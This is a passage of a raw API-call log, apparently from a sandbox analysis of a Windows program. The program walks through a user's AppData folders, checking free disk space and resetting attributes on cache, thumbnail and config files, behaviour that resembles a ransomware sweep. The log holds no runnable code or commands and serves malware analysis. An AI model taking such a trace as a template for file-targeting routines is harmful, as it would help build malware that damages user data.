HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.444] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 0x89 [0141.445] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 0x89 [0141.445] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.446] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.447] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.447] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.448] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.449] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.450] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.450] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.464] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0141.472] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", dwFileAttributes=0x80) returned 1 [0141.474] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0141.480] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x80) returned 1 [0141.484] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0141.488] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml", dwFileAttributes=0x80) returned 1 [0141.515] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.523] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml", dwFileAttributes=0x80) returned 1 [0141.535] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.540] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", dwFileAttributes=0x80) returned 1 [0141.543] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.555] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", dwFileAttributes=0x80) returned 1 [0141.558] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.572] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db", dwFileAttributes=0x80) returned 1 [0141.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.582] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", dwFileAttributes=0x80) returned 1 [0141.584] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.667] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", dwFileAttributes=0x80) returned 1 [0141.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.681] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", dwFileAttributes=0x80) returned 1 [0141.684] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.766] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", dwFileAttributes=0x80) returned 1 [0141.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.782] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db", dwFileAttributes=0x80) returned 1 [0141.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0141.788] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db", dwFileAttributes=0x80) returned 1 [0141.820] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.826] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3e3XC[2].png", dwFileAttributes=0x80) returned 1 [0141.829] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.834] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA3vOVA[1].png", dwFileAttributes=0x80) returned 1 [0141.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.842] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png", dwFileAttributes=0x80) returned 1 [0141.844] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.849] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png", dwFileAttributes=0x80) returned 1 [0141.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.857] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png", dwFileAttributes=0x80) returned 1 [0141.861] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.866] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png", dwFileAttributes=0x80) returned 1 [0141.870] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.875] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png", dwFileAttributes=0x80) returned 1 [0141.878] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.884] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm", dwFileAttributes=0x80) returned 1 [0141.887] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.894] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png", dwFileAttributes=0x80) returned 1 [0141.897] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.902] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png", dwFileAttributes=0x80) returned 1 [0141.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.916] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png", dwFileAttributes=0x80) returned 1 [0141.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.925] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png", dwFileAttributes=0x80) returned 1 [0141.927] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.932] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png", dwFileAttributes=0x80) returned 1 [0141.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.941] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png", dwFileAttributes=0x80) returned 1 [0141.944] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.950] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg", dwFileAttributes=0x80) returned 1 [0141.954] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.958] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg", dwFileAttributes=0x80) returned 1 [0141.962] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.967] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBLhZX[1].jpg", dwFileAttributes=0x80) returned 1 [0141.969] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.975] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBNiEo[1].jpg", dwFileAttributes=0x80) returned 1 [0141.979] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.984] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg", dwFileAttributes=0x80) returned 1 [0141.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0141.994] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg", dwFileAttributes=0x80) returned 1 [0141.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.002] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO8dQ[1].jpg", dwFileAttributes=0x80) returned 1 [0142.006] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.012] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBOe7C[1].jpg", dwFileAttributes=0x80) returned 1 [0142.015] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.020] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPThN[1].jpg", dwFileAttributes=0x80) returned 1 [0142.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.028] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBPUFJ[1].jpg", dwFileAttributes=0x80) returned 1 [0142.031] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.037] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg", dwFileAttributes=0x80) returned 1 [0142.040] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.045] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg", dwFileAttributes=0x80) returned 1 [0142.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.053] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBsqNL[1].jpg", dwFileAttributes=0x80) returned 